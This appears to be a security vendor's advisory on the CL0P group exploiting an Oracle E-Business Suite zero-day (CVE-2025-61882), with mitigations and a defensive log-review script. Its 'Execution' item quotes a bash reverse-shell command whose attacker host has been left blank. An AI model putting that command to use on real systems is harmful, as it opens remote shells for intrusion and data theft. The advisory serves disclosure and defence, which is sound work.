CL0P Leverages Oracle EBS Zero-Day in A Global Extortion Campaign


In October 2025, cybersecurity researchers and vendors including Cybereason, Halcyon, and Oracle confirmed active exploitation of a critical remote code execution (RCE) vulnerability in Oracle E-Business Suite (EBS) by the CL0P ransomware group.
This zero-day campaign is a sophisticated data-theft and extortion operation targeting on-premises, customer-managed Oracle EBS deployments worldwide.

Severity: Critical

Vulnerability Exploited

  • CVE ID: CVE-2025-61882
  • CVSS Score: 9.8
  • Affected Versions: Oracle EBS 12.2.3 – 12.2.14
  • Description: The vulnerability permits unauthenticated remote attackers to execute arbitrary commands on affected systems over HTTP, enabling full compromise of Oracle EBS instances.

Threat Details

  • Threat Actor: The campaign is attributed with high confidence to the CL0P ransomware operation (FIN11 / TA505), a financially motivated group known for exploiting widely used enterprise platforms to maximize victim reach.
  • Timeline: Between late July and early October 2025, CL0P conducted coordinated attacks targeting Oracle EBS environments.
  • Initial intrusions leveraged the newly discovered CVE-2025-61882 vulnerability and, in some instances, chained previously unpatched CVEs from Oracle’s July 2025 Critical Patch Update (CPU) cycle.
  • Execution: Exploitation led to execution of reverse shell commands, such as sh -c /bin/bash -i >& /dev/tcp//0>&1, enabling direct command execution on the compromised host.
  • Persistence and Reconnaissance: Attackers deployed lightweight webshells and credential-harvesting scripts to map EBS data structures.
  • Exfiltration: High-value ERP datasets (financial, HR, customer information) were exfiltrated to attacker-controlled infrastructure.
  • Extortion Phase: Victims received ransom demands via spoofed or compromised email accounts referencing stolen Oracle EBS data.

Recommendations

  1. Apply the Oracle July 2025 CPU for Oracle EBS, Database, and Fusion Middleware.
  2. Apply the October 5, 2025 patch for Oracle EBS addressing CVE-2025-61882.
  3. Enforce SSO and MFA for all Oracle EBS and related accounts.
  4. Oracle EBS users should engage DFIR if July 2025 patching was incomplete before July 31, 2025. As part of that review:
    • Look for unauthorized password resets, role escalations, or service account modifications.
    • Search for unauthorized scheduled jobs, cron tasks, or database triggers created outside maintenance windows.
    • Review web access and database query logs for large, atypical data exports or downloads from ERP modules.
  5. Restrict external access to Oracle EBS URLs such as:
    • https[:]///OA_HTML/AppsLocalLogin.jsp
    • BI Publisher endpoints
  6. Block the IOCs at their respective controls:
    https://www.virustotal.com/gui/collection/f485056b431b67fecee768dc4cc71a05f86b3c244df4b6a5e950b3a363a14cea/iocs
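The log-review and access-restriction items above (recommendations 4 and 5) can be checked mechanically. The following script is an added example, not part of this advisory or of any Oracle tooling: it parses combined-format access-log lines as written by the Oracle HTTP Server in front of EBS, flags hits on the login page and BI Publisher from non-internal addresses, and flags atypically large responses, both per request and summed per external source. The log layout, the RFC 1918 internal ranges, the /xmlpserver/ prefix for BI Publisher, the byte thresholds and the sample lines are all assumptions to adjust for your environment.

```python
import ipaddress
import re
from collections import defaultdict

# Combined-format access log as written by the Oracle HTTP Server fronting EBS
# (assumption: your OHS log layout matches; adjust LOG_RE if it does not).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
                    r'(?P<status>\d{3}) (?P<bytes>\d+|-)')
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Paths the advisory says should not be reachable from the internet; the BI Publisher
# prefix is an assumption, confirm the real path in your deployment.
RESTRICTED_PREFIXES = ("/OA_HTML/AppsLocalLogin.jsp", "/xmlpserver/")
SINGLE_RESPONSE_LIMIT = 50_000_000   # bytes in one response; tune to your baseline
PER_SOURCE_LIMIT = 100_000_000       # bytes served to one external source in the window

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec

def is_internal(ip):
    try:
        return any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)
    except ValueError:  # malformed client field: treat as external
        return False

def review_access_log(lines):
    findings, per_source = [], defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        external = not is_internal(rec["ip"])
        if external and rec["path"].startswith(RESTRICTED_PREFIXES):
            findings.append(("external_restricted_endpoint", rec["ip"], rec["path"]))
        if rec["bytes"] >= SINGLE_RESPONSE_LIMIT:
            findings.append(("large_response", rec["ip"], rec["path"]))
        if external:
            per_source[rec["ip"]] += rec["bytes"]
    for ip, total in per_source.items():
        if total >= PER_SOURCE_LIMIT:  # many mid-sized pulls add up to one export
            findings.append(("large_external_volume", ip, str(total)))
    return findings

# Constructed sample lines; 203.0.113.7 is an RFC 5737 documentation address.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Oct/2025:02:14:09 +0000] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 200 5120',
    '10.20.1.15 - - [03/Oct/2025:08:01:33 +0000] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [03/Oct/2025:02:20:41 +0000] "POST /OA_HTML/OA.jsp HTTP/1.1" 200 68000000',
    '203.0.113.7 - - [03/Oct/2025:02:31:05 +0000] "POST /OA_HTML/OA.jsp HTTP/1.1" 200 41000000',
]
```

Run `review_access_log(SAMPLE_LOG)` on the constructed lines: the internal login hit is silent, while the external source is reported once for reaching the login page, once for a single 68 MB response, and once for its 109 MB total.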


Ampcus Cyber